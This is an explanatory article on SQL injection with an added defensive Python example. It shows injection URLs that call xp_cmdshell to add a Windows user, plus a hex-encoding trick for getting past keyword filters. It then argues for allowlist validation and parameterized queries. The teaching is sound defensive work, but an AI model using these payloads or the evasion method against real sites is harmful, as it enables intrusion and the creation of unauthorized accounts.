This is also an example from my "Implementation and Application of SQL Injection" article. Because no filtering is in place, injecting data succeeds easily, as shown below:

The code is as follows:
http://www.jb51.net/show.asp?id=1;exec master.dbo.xp_cmdshell 'net user Angel Pass /add';--
This is where a common misconception arises: the belief that as long as the variables are filtered, SQL injection attacks are prevented. Merely filtering the program's inputs does not remove the root cause of injection. Look at the following statement, which still gets through such a filter:

The code is as follows:
http://www.jb51.net/show.asp?id=1;declare%20@a%20sysname%20select%20@a=0x<hex value, omitted on the page>%20exec%20master.dbo.xp_cmdshell%20@a;--
Does it look very different from the sentence above? Yet the result is exactly the same: both are SQL statements.

The code is as follows:
[the hexadecimal string itself is not present on the page]

This is the hexadecimal form of "net user Angel Pass /add". If you know SQL, it is easy to follow: first declare a variable @a, assign the hex-encoded command to @a, and then pass @a to xp_cmdshell to execute it. @a can hold any command. Written out:

declare @a sysname
select @a=0x<hex value, omitted on the page>
exec master.dbo.xp_cmdshell @a
Solution:
Validate the variables instead of only filtering them: allow only the characters a given field may legitimately contain. For a numeric variable, for example, accept nothing but digits. Beyond that, it is entirely up to the program's author.
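The following is an added example, not code from the original article, showing why the article's solution is the right one. It compares the keyword blocklist the misconception relies on with a strict numeric check on the id parameter, and then binds the validated value through a parameterized query (SQLite in memory here, so it runs offline; the table name, rows and request values are constructed for the example, and the hex literal encodes the harmless string "sample" rather than any command).

```python
import re
import sqlite3

# Constructed sample values for the "id" request parameter (not taken from the page).
# The hex literal below is the encoding of the constructed string "sample".
INPUTS = {
    "normal": "1",
    "plain_injection": "1;exec master.dbo.xp_cmdshell 'net user x y /add';--",
    "hex_injection": "1;declare @a sysname select @a=0x73616d706c65 exec master.dbo.xp_cmdshell @a;--",
}

# Phrases a "filter the command text" blocklist would look for (assumed for the example).
BLOCKLIST = ("net user", "'")


def naive_keyword_filter(value):
    """Blocklist approach: reject values containing known command text.
    Returns True when the value is allowed through."""
    lowered = value.lower()
    return not any(bad in lowered for bad in BLOCKLIST)


def strict_numeric_check(value):
    """Allowlist approach from the article: a numeric id may contain only digits."""
    return re.fullmatch(r"[0-9]+", value) is not None


def build_demo_db():
    """In-memory table standing in for the page's show.asp backend (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE show (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO show VALUES (1, 'first post')")
    return conn


def fetch_title(conn, raw_id):
    """Validate first, then bind the integer as a parameter so no part of the
    request string is ever interpreted as SQL."""
    if not strict_numeric_check(raw_id):
        raise ValueError("id must be a non-negative integer")
    row = conn.execute("SELECT title FROM show WHERE id = ?", (int(raw_id),)).fetchone()
    return row[0] if row else None


def evaluate():
    """For each sample input: (passes the blocklist?, passes the numeric check?)."""
    return {name: (naive_keyword_filter(v), strict_numeric_check(v)) for name, v in INPUTS.items()}


if __name__ == "__main__":
    for name, verdict in evaluate().items():
        print(f"{name:16s} blocklist_allows={verdict[0]!s:5s} numeric_allows={verdict[1]}")
    print(fetch_title(build_demo_db(), INPUTS["normal"]))
```

The hex-encoded request slips past the blocklist because the command text it is looking for no longer appears, exactly as the article describes, while the digit-only check rejects both injected values for the same reason: neither is a number. The parameterized query is the second layer; even if a validation rule is later loosened, the value is passed as data, not as part of the statement.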